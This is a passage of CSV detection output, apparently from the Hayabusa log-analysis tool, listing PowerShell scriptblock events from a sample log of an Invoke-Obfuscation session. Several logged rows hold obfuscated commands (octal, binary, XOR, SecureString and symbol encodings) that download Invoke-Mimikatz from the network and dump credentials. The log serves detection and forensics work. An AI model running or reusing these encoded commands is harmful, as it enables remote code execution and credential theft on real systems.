)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.419 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.432 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.518 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.526 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.531 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.534 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.537 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.539 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.543 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.553 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.590 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.603 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.765 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.772 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.809 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:33.323 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $ENV:pUbLIc[13]+$EnV:pubLIc[5]+'X') ([STrIng]::JOin('' , ((111 ,105, 130 , 40,50,116 ,145 , 167, 55,117,142 , 152 ,145,143 ,164 , 40, 116,145,164,56, 127, 145 ,142, 103 ,154, 151 ,145 ,156 , 164,51, 56 , 104 ,157, 167 ,156 , 154 , 157 , 141 , 144, 123 ,164,162 ,151, 156,147, 50 ,47 ,150 , 164,164,160 , 163 , 72,57, 57,162, 141,167 , 56,147 ,151, 164,150, 165, 142 ,165 , 163, 145, 162,143 ,157, 156 ,164 ,145,156 , 164,56 ,143 ,157 ,155,57, 155 ,141, 164 , 164, 151 , 146,145 ,163, 164 , 141, 164 ,151, 157, 156 ,57 , 120 ,157,167 , 145,162 , 123,160 , 154, 157, 151, 164, 57,155 , 141, 163 ,164,145,162,57,105, 170 , 146,151, 154, 164 , 162 , 141,164,151,157,156 , 57,111,156 , 166 , 157, 153, 145,55, 115 ,151, 155 ,151, 153,141, 164 ,172,56, 160 , 163, 61 ,47 ,51,73 , 40,111,156 , 166, 157 ,153 , 145 ,55 ,115, 151 , 155 ,151 ,153 , 141, 164 ,172 ,40,55, 104,165 , 155, 160 ,103, 162 , 145 , 144 , 163 )| FOrEacH { ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) } )))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:33.323 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:51.663 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $vErBOSePreFErencE.TOSTRING()[1,3]+'X'-joIN'')(( '1001001}1000101r1011000C100000&101000&1001110C1100101r1110111C101101;1001111v1100010;1101010r1100101v1100011j1110100v100000X1001110o1100101}1110100X101110}1010111;1100101r1100010v1000011X1101100v1101001j1100101v1101110j1110100}101001j101110}1000100j1101111g1110111g1101110}1101100g1101111g1100001;1100100;1010011}1110100;1110010g1101001X1101110&1100111X101000v100111}1101000;1110100r1110100j1110000}1110011v111010j101111r101111}1110010o1100001X1110111r101110r1100111X1101001&1110100o1101000g1110101j1100010C1110101}1110011&1100101X1110010}1100011}1101111j1101110v1110100j1100101C1101110;1110100r101110&1100011r1101111;1101101&101111&1101101X1100001}1110100}1110100;1101001o1100110v1100101;1110011C1110100C1100001j1110100r1101001;1101111o1101110o101111j1010000&1101111X1110111}1100101j1110010j1010011&1110000;1101100r1101111r1101001;1110100o101111&1101101v1100001r1110011;1110100g1100101j1110010j101111r1000101v1111000r1100110j1101001X1101100C1110100r1110010;1100001o1110100C1101001;1101111X1101110j101111C1001001X1101110;1110110}1101111r1101011&1100101j101101&1001101r1101001v1101101;1101001o1101011o1100001&1110100o1111010v101110g1110000r1110011}110001g100111o101001v111011j100000;1001001j1101110r1110110X1101111v1101011}1100101v101101;1001101r1101001&1101101;1101001C1101011v1100001&1110100j1111010}100000}101101}1000100C1110101v1101101r1110000v1000011j1110010r1100101v1100100;1110011' -splIT 'o'-splIt '&' -SPlIT 'r' -SplIt 'v' -sPLIT 'g'-SPliT';'-spLIT'X'-sPlIt'}' -sPLIT 'C'-SPLIT'j'|FOReaCH-ObjEct {([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) })-JOIN '' )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:51.666 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:23.660 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:23.660 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:23.660 +00:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.455 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.469 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.555 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.563 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.568 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.571 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.574 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.577 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.580 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.581 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.585 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.588 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.901 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:40.071 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:40.085 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:40.121 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:43.135 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 ,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor""0x5d"" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:43.135 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{[cHAR] ( $_ -BXor""0x5d"" ) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:04.309 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:04.320 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:06.877 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} 